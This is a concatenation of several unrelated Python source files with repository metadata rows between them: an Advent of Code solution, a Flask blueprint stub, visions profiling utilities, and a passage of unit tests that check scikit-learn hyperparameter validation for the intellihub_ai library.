| 24.285714 | 42 | 0.629412 | 29 | 170 | 3.689655 | 0.689655 | 0.11215 | 0.149533 | 0.186916 | 0.261682 | 0.261682 | 0 | 0 | 0 | 0 | 0 | 0.205674 | 0.170588 | 170 | 6 | 43 | 28.333333 | 0.553191 | 0.929412 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d946161641476112516351e1e744f12db21b12a5 | 140 | py | Python | PensePython.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | PensePython.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | PensePython.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | '''matriz = []
for i in range(3):
linha = []
for j in range(3):
linha.append(0)
matriz.append(linha)
print(matriz)'''
| 14 | 24 | 0.535714 | 20 | 140 | 3.75 | 0.55 | 0.186667 | 0.213333 | 0.346667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029703 | 0.278571 | 140 | 9 | 25 | 15.555556 | 0.712871 | 0.942857 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d95cb479fdbef85d43006be9775724b0dc1be570 | 46 | py | Python | models/ops/depthavgpooling/functions/__init__.py | E18301194/DepthAwareCNN | 8ae98f7f18b69f79e7df03397dec2543d3d0c8eb | [
"MIT"
] | 278 | 2018-05-09T03:08:56.000Z | 2022-03-10T08:05:10.000Z | models/ops/depthavgpooling/functions/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 35 | 2018-05-31T15:42:44.000Z | 2022-03-17T09:36:13.000Z | models/ops/depthavgpooling/functions/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 80 | 2018-06-03T10:04:48.000Z | 2022-03-05T12:57:31.000Z | from .depthavgpooling import depth_avgpooling
| 23 | 45 | 0.891304 | 5 | 46 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 46 | 1 | 46 | 46 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d97c485e85e00287f5e5c1cd6f7ba7de1763b87c | 1,085 | py | Python | Day3/day3.2.py | akashvacher/AdventOfCode2021 | 8d1429c0cc33cf67f84097b38fb01f02e69c1717 | [
"MIT"
] | null | null | null | Day3/day3.2.py | akashvacher/AdventOfCode2021 | 8d1429c0cc33cf67f84097b38fb01f02e69c1717 | [
"MIT"
] | null | null | null | Day3/day3.2.py | akashvacher/AdventOfCode2021 | 8d1429c0cc33cf67f84097b38fb01f02e69c1717 | [
"MIT"
] | null | null | null | from collections import Counter
def part2():
all_lines = open("in.txt").read().splitlines()
# Get oxygen_rating
lines = all_lines[:]
i = 0
while len(lines) > 1:
bits = Counter(line[i] for line in lines)
if bits["1"] >= bits["0"]:
lines = [line for line in lines if line[i] == "1"]
elif bits["1"] < bits["0"]:
lines = [line for line in lines if line[i] == "0"]
i += 1
# There should only be one line remaining after pruning
assert len(lines) == 1
oxygen_rating = int(lines[0], 2)
# Get co2_rating
lines = all_lines[:]
i = 0
while len(lines) > 1:
bits = Counter(line[i] for line in lines)
if bits["1"] >= bits["0"]:
lines = [line for line in lines if line[i] == "0"]
elif bits["1"] < bits["0"]:
lines = [line for line in lines if line[i] == "1"]
i += 1
# There should only be one line remaining after pruning
assert len(lines) == 1
co2_rating = int(lines[0], 2)
print(oxygen_rating * co2_rating)
part2()
| 27.820513 | 62 | 0.546544 | 161 | 1,085 | 3.627329 | 0.242236 | 0.05137 | 0.092466 | 0.143836 | 0.791096 | 0.736301 | 0.736301 | 0.736301 | 0.736301 | 0.736301 | 0 | 0.038822 | 0.311521 | 1,085 | 38 | 63 | 28.552632 | 0.742972 | 0.129032 | 0 | 0.740741 | 0 | 0 | 0.019149 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.037037 | false | 0 | 0.037037 | 0 | 0.074074 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
79d16c2eb9c7d3f87d22b7251ff63aa2533bc83b | 80 | py | Python | tests/test_chardif.py | shaypal5/chardif | ae203a8dfecee3eaa82a76f59ec2799d27d2e107 | [
"MIT"
] | null | null | null | tests/test_chardif.py | shaypal5/chardif | ae203a8dfecee3eaa82a76f59ec2799d27d2e107 | [
"MIT"
] | null | null | null | tests/test_chardif.py | shaypal5/chardif | ae203a8dfecee3eaa82a76f59ec2799d27d2e107 | [
"MIT"
] | null | null | null | from chardif import chardif
def test_basic():
chardif("rabbit", "grabit")
| 13.333333 | 31 | 0.7 | 10 | 80 | 5.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175 | 80 | 5 | 32 | 16 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8de2206126f84c2301bea88c30822dc3f0179d11 | 99 | py | Python | app/main/__init__.py | jeantardelli/web-dev-flask | 20582ec5967094803625263177ba111580816cf9 | [
"MIT"
] | 1 | 2020-12-01T20:30:29.000Z | 2020-12-01T20:30:29.000Z | app/main/__init__.py | jeantardelli/web-dev-flask | 20582ec5967094803625263177ba111580816cf9 | [
"MIT"
] | null | null | null | app/main/__init__.py | jeantardelli/web-dev-flask | 20582ec5967094803625263177ba111580816cf9 | [
"MIT"
] | null | null | null | from flask import Blueprint
main_bp = Blueprint('main_bp', __name__)
from . import views, errors
| 16.5 | 40 | 0.767677 | 14 | 99 | 5 | 0.642857 | 0.371429 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 99 | 5 | 41 | 19.8 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.070707 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
5c108ae14d6d2e310d97104f0f5c63fe43568030 | 4,021 | py | Python | tests/performance/timings.py | bhumikapahariapuresoftware/visions | 8838d89b4f02e401112378b4662a779227ead9f8 | [
"BSD-4-Clause"
] | 142 | 2020-01-07T21:17:10.000Z | 2022-03-30T13:10:14.000Z | tests/performance/timings.py | bhumikapahariapuresoftware/visions | 8838d89b4f02e401112378b4662a779227ead9f8 | [
"BSD-4-Clause"
] | 121 | 2020-01-07T02:26:38.000Z | 2022-03-29T17:18:19.000Z | tests/performance/timings.py | bhumikapahariapuresoftware/visions | 8838d89b4f02e401112378b4662a779227ead9f8 | [
"BSD-4-Clause"
] | 18 | 2020-02-17T03:17:37.000Z | 2022-02-20T14:01:11.000Z | import pandas as pd
from visions.utils.profiling import (
profile_relation_is_relation,
profile_relation_transform,
profile_type,
)
def performance_report(series_dict, convert_map, membership=True):
"""Relative performance benchmark for casting"""
performance_list = []
for type_, _, series_names in convert_map:
if membership:
# True: "series in type"
test_series = {name: series_dict[name] for name in series_names}
else:
# False: "series not in type"
test_series = {
name: s for name, s in series_dict.items() if name not in series_names
}
performance_list.extend(profile_type(type_, test_series))
df = pd.DataFrame.from_records(performance_list)
df["type"] = df["type"].astype(str)
aggs = ["min", "max"]
agg_labels = ["worst", "best"]
summary_cols = ["series"] # , "big O"]
agg_df = df.groupby("type").agg(aggs).reset_index()[["type"] + summary_cols]
agg_df.columns = ["_".join(col).strip("_") for col in agg_df.columns]
colrenames = {
f"{name}_{agg}": f"{rename} {name}"
for name in summary_cols
for agg, rename in zip(aggs, agg_labels)
}
agg_df.rename(columns=colrenames, inplace=True)
df["normed run time"] = df["average run time"] / df["average run time"].min()
df = df.groupby("type")["normed run time"].describe().sort_values("50%")
df = pd.merge(df, agg_df, on="type", how="left")
return df
def get_relation(to_type, from_type):
return to_type.relations[from_type]
def relations_is_relation_test(series_dict, convert_map):
relation_tests = {
get_relation(*conversions[0:2]): conversions[2] for conversions in convert_map
}
performance_list = []
for relation, names in relation_tests.items():
test_series = {name: series_dict[name] for name in names}
performance_list.extend(profile_relation_is_relation(relation, test_series))
df = pd.DataFrame.from_records(performance_list)
grouper = "relation"
df[grouper] = df[grouper].astype(str)
aggs = ["min", "max"]
agg_labels = ["worst", "best"]
summary_cols = ["series"] # , "big O"]
agg_df = df.groupby(grouper).agg(aggs).reset_index()[[grouper] + summary_cols]
agg_df.columns = ["_".join(col).strip("_") for col in agg_df.columns]
colrenames = {
f"{name}_{agg}": f"{rename} {name}"
for name in summary_cols
for agg, rename in zip(aggs, agg_labels)
}
agg_df.rename(columns=colrenames, inplace=True)
df["normed run time"] = df["average run time"] / df["average run time"].min()
df = df.groupby(grouper)["normed run time"].describe().sort_values("50%")
df = pd.merge(df, agg_df, on=grouper, how="left")
return df
def relations_transform_test(series_dict, convert_map):
relation_tests = {
get_relation(*conversions[0:2]): conversions[2] for conversions in convert_map
}
performance_list = []
for relation, names in relation_tests.items():
test_series = {name: series_dict[name] for name in names}
performance_list.extend(profile_relation_transform(relation, test_series))
df = pd.DataFrame.from_records(performance_list)
grouper = "relation"
df[grouper] = df[grouper].astype(str)
aggs = ["min", "max"]
agg_labels = ["worst", "best"]
summary_cols = ["series"] # , "big O"]
agg_df = df.groupby(grouper).agg(aggs).reset_index()[[grouper] + summary_cols]
agg_df.columns = ["_".join(col).strip("_") for col in agg_df.columns]
colrenames = {
f"{name}_{agg}": f"{rename} {name}"
for name in summary_cols
for agg, rename in zip(aggs, agg_labels)
}
agg_df.rename(columns=colrenames, inplace=True)
df["normed run time"] = df["average run time"] / df["average run time"].min()
df = df.groupby(grouper)["normed run time"].describe().sort_values("50%")
df = pd.merge(df, agg_df, on=grouper, how="left")
return df
| 37.933962 | 87 | 0.647849 | 543 | 4,021 | 4.594843 | 0.160221 | 0.03006 | 0.026453 | 0.031263 | 0.803607 | 0.781964 | 0.766733 | 0.766733 | 0.766733 | 0.732265 | 0 | 0.003777 | 0.209898 | 4,021 | 105 | 88 | 38.295238 | 0.781555 | 0.030589 | 0 | 0.655172 | 0 | 0 | 0.102109 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045977 | false | 0 | 0.022989 | 0.011494 | 0.114943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5c3797af24bee679152d46c2aede4d14093d6f3b | 33 | py | Python | EditSQL/agent.py | Deliangus/MISP | 8632b5ea120f8385825a08eb930232d3ea74c426 | [
"MIT"
] | 54 | 2019-10-07T03:36:25.000Z | 2021-12-27T02:11:11.000Z | EditSQL/agent.py | Deliangus/MISP | 8632b5ea120f8385825a08eb930232d3ea74c426 | [
"MIT"
] | 1 | 2021-08-13T07:48:15.000Z | 2021-08-31T01:30:12.000Z | EditSQL/agent.py | Deliangus/MISP | 8632b5ea120f8385825a08eb930232d3ea74c426 | [
"MIT"
] | 4 | 2020-01-29T17:38:28.000Z | 2021-12-10T19:09:37.000Z | from MISP_SQL.agent import Agent
| 16.5 | 32 | 0.848485 | 6 | 33 | 4.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
30a7706c5a4286294883c9f973ea6201fa531094 | 68,119 | py | Python | test/ml_tests/test_scikit_algo_assertions.py | Spotflock/intellihub-sdk-python | 5b84e5477691c9ee38f994988ccd59155b7fdf64 | [
"MIT"
] | 2 | 2021-12-07T12:20:06.000Z | 2022-03-09T07:31:50.000Z | test/ml_tests/test_scikit_algo_assertions.py | Spotflock/intellihub-sdk-python | 5b84e5477691c9ee38f994988ccd59155b7fdf64 | [
"MIT"
] | null | null | null | test/ml_tests/test_scikit_algo_assertions.py | Spotflock/intellihub-sdk-python | 5b84e5477691c9ee38f994988ccd59155b7fdf64 | [
"MIT"
] | 1 | 2021-12-06T13:35:09.000Z | 2021-12-06T13:35:09.000Z | import unittest
import os
os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from intellihub_ai.assertions import hyper_parameter_check
class TestScikitClassificationAlgo(unittest.TestCase):
def setUp(self):
self.library = "scikit"
self.service = "classification"
pass
# ------------- DECISION TREE -------------------- #
def test_decision_tree_1(self):
# default params
algorithm = "DecisionTrees"
params = {'ccp_alpha': 0.0,'class_weight': None,'criterion':'gini','max_depth': None,'max_features': None, 'max_leaf_nodes': None,'min_impurity_decrease': 0.0,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'splitter': 'best'}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_2(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 0.5,'criterion': 'gun'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_3(self):
algorithm = "DecisionTrees"
params = {'max_depth': 0.5,'max_features': 'gun','max_leaf_nodes': 1.0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_4(self):
algorithm = "DecisionTrees"
params = {'max_depth': 5,'max_features': 'gun','max_leaf_nodes': 2}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_5(self):
algorithm = "DecisionTrees"
params = {'min_impurity_decrease': -0.5,'min_samples_leaf': 'gun','min_samples_split': 1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_6(self):
algorithm = "DecisionTrees"
params = {'min_impurity_decrease': 0.5,'min_samples_leaf': 0.7,'min_samples_split': 1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_7(self):
algorithm = "DecisionTrees"
params = {'min_impurity_decrease': 0.5,'min_samples_leaf': 0.3,'min_samples_split': 1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_8(self):
algorithm = "DecisionTrees"
params = {'min_weight_fraction_leaf': 0.5,'splitter': 'best'}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- RANDOM FOREST -------------------- #
def test_random_forest_1(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0,'class_weight': None,'criterion': 'gini','max_depth': None,'max_features': 'auto','max_leaf_nodes': None,'max_samples': None,'min_impurity_decrease': 0.0,'min_impurity_split': None,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'n_estimators': 100,'n_jobs': None,'oob_score': False,'verbose': 0,'warm_start': False}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_2(self):
algorithm = "RandomForest"
params = {'bootstrap': "true", 'ccp_alpha': -2}#,'class_weight': None,'criterion': 'gini','max_depth': None,'max_features': 'auto','max_leaf_nodes': None,'max_samples': None,'min_impurity_decrease': 0.0,'min_impurity_split': None,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'n_estimators': 100,'n_jobs': None,'oob_score': False,'verbose': 0,'warm_start': False}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_3(self):
algorithm = "RandomForest"
params = {'class_weight': "random_value_cause_except",'criterion': 'gini','max_depth': 0.34}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_4(self):
algorithm = "RandomForest"
params = {'class_weight': "random_value_cause_except",'criterion': 'gini','max_depth': 3}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_5(self):
algorithm = "RandomForest"
params = {'max_features': 'random_value_cause_except','max_leaf_nodes': 1.5}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_6(self):
algorithm = "RandomForest"
params = {'max_features': 'random_value_cause_except','max_leaf_nodes': 3}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_7(self):
algorithm = "RandomForest"
params = {'min_impurity_decrease': 0.0,'min_impurity_split': None}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_8(self):
algorithm = "RandomForest"
params = {'min_impurity_decrease': 0.0,'min_impurity_split': -0.4}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_9(self):
algorithm = "RandomForest"
params = {'min_samples_leaf': -0.7,'min_samples_split': 0.5}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_10(self):
algorithm = "RandomForest"
params = {'n_estimators': -100}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_11(self):
algorithm = "RandomForest"
params = {'min_weight_fraction_leaf': 1,'n_estimators': 0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_12(self):
algorithm = "RandomForest"
params = {'min_weight_fraction_leaf': 0.2,'n_estimators': 10}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- BAGGING -------------------- #
def test_bagging_1(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': True, 'bootstrap_features': False, 'max_features': 1.0,'max_samples': 1.0,'n_estimators': 10,'n_jobs': None,'oob_score': False,'random_state': None,'verbose': 0, 'warm_start': False}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_2(self):
algorithm = "Bagging"
params = {'bootstrap': "false"}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_3(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_4(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': -30}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_5(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': 30, 'max_samples': "can_be_anything"}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_6(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': 30, 'max_samples': "can_be_anything",'n_estimators':-100}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_7(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': 30, 'max_samples': "can_be_anything",'n_estimators':100,'oob_score':"fas"}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_8(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': 30, 'max_samples': "can_be_anything",'n_estimators':100,'oob_score':False}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- ExtraTrees -------------------- #
def test_extratrees_1(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False,'ccp_alpha': 0.0,'class_weight': None,'criterion': 'gini','max_depth': None,'max_features': 'auto','max_leaf_nodes': None,'max_samples': None,'min_impurity_decrease': 0.0,'min_impurity_split':None,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'n_estimators': 100,'n_jobs': None,'oob_score': False,'random_state': None,'verbose': 0,'warm_start': False}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_2(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': -0.1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_3(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'ginient'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_4(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything'}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_5(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_6(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything"}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_7(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes': 2,
"max_samples": "canbeanything", "min_impurity_decrease": 0}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_8(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes': 2,
"max_samples": "canbeanything", "min_impurity_decrease": 1}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_9(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes': 2,
"max_samples": "canbeanything", "min_samples_leaf": 0.7}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_10(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "min_samples_split":0.2}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_11(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "min_weight_fraction_leaf":-0.3}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_12(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "min_samples_leaf":0.2}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_13(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "n_estimators":0.4}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_14(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "min_samples_leaf":1,"n_estimators":300,"min_weight_fraction_leaf":0.3}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- KNN -------------------- #
def test_knn_1(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'auto', 'leaf_size': 30, 'metric': 'minkowski', 'metric_params': None, 'n_jobs': None, 'n_neighbors': 5, 'p': 2, 'weights': 'uniform'}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_2(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'randomname'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_3(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'kd_tree', 'leaf_size': -30}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_4(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'ball_tree', 'leaf_size': 30, 'metric': 'minkowski'}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_5(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'ball_tree', 'leaf_size': 30, 'metric':"chebyshev", 'metric_params': None,'n_neighbors': -5.0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_6(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'ball_tree', 'leaf_size': 30, 'metric':"chebyshev", 'metric_params': None,'n_neighbors': 5, 'p':1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_7(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'ball_tree', 'leaf_size': 30, 'metric':"chebyshev", 'metric_params': None,'n_neighbors': 5, 'p':3}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- AdaBoost -------------------- #
def test_adaboost_1(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R','base_estimator': None,'learning_rate': 1.0,'n_estimators': 50,'random_state': None}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_2(self):
algorithm = "AdaBoost"
params = {'algorithm': 'afaSAMME.R'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_3(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R','learning_rate': -1.0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_4(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R','learning_rate': 1.0, 'n_estimators': 5.2}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_5(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R','learning_rate': 1.0, 'n_estimators': 54}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_6(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME','learning_rate': 1.0, 'n_estimators': 54}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- NaiveBayesMultinomial -------------------- #
def test_naivebayes_1(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': 1.0, 'class_prior': None, 'fit_prior': True}
# assertion should pass
